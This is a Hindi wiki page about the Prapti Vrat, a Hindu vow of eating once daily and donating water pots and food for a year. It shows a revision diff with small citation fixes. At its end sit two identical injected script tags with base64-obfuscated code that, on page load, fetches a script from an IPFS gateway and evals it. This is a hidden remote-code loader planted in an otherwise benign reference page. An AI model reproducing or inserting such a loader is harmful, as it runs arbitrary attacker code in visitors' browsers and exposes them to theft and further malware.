Difference between revisions of "प्राप्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*जो एक [[वर्ष]] तक एकभक्त रह कर जलपूर्ण घट एवं भोजन का दान करता है, वह एक कल्प तक शिवलोक में वास करता है।<ref>[[मत्स्य पुराण]] (101|55)</ref>; <ref>कृत्यकल्पतरु (व्रत0 447, 34वाँ षष्टिव्रत)</ref>; <ref>हेमाद्रि (व्रत0 2, 866, [[पद्म पुराण]] से उद्धरण)</ref>
+
*जो एक [[वर्ष]] तक एकभक्त रह कर जलपूर्ण घट एवं भोजन का दान करता है, वह एक कल्प तक शिवलोक में वास करता है।<ref>[[मत्स्य पुराण]] (101|55</ref>; <ref>कृत्यकल्पतरु (व्रत0 447, 34वाँ षष्टिव्रत</ref>; <ref>हेमाद्रि (व्रत0 2, 866, [[पद्म पुराण]] से उद्धरण</ref>
 
 
 
 
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:53, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jo ek varsh tak ekabhakt rah kar jalapoorn ghat evan bhojan ka dan karata hai, vah ek kalp tak shivalok mean vas karata hai.[1]; [2]; [3]

 


tika tippani aur sandarbh

  1. matsy puran (101|55
  2. krityakalpataru (vrat0 447, 34vaan shashtivrat
  3. hemadri (vrat0 2, 866, padm puran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>